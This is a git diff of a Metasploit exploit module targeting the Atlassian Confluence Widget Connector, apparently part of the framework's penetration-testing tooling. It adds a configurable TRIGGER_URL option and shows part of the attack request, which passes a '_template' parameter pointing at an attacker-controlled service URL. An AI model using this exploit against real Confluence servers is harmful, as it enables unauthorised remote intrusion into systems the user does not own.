diff --git a/modules/exploits/multi/http/confluence_widget_connector.md b/modules/exploits/multi/http/confluence_widget_connector.md index a33d4767cf..7ae598bc62 100644 --- a/modules/exploits/multi/http/confluence_widget_connector.md +++ b/modules/exploits/multi/http/confluence_widget_connector.md @@ -30,6 +30,7 @@ List the steps needed to make sure this thing works # Options - **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default) +- **TRIGGER_URL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=dQw4w9WgXcQ" is the default) # Scenario ## Tested on Confluence 6.8.2 with Windows target diff --git a/modules/exploits/multi/http/confluence_widget_connector.rb b/modules/exploits/multi/http/confluence_widget_connector.rb index 887f98fddf..5a27770da4 100644 --- a/modules/exploits/multi/http/confluence_widget_connector.rb +++ b/modules/exploits/multi/http/confluence_widget_connector.rb @@ -59,7 +59,9 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('TARGETURI', [true, 'The base to Confluence', '/']) + OptString.new('TARGETURI', [true, 'The base to Confluence', '/']), + OptString.new('TRIGGER_URL', [true, 'Url to external video service to trigger vulnerability', + 'https://www.youtube.com/watch?v=dQw4w9WgXcQ']) ]) end @@ -212,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote 'name' => 'widget', 'body' => '', 'params' => { - 'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ', + 'url' => datastore['TRIGGER_URL'], '_template' => service_url }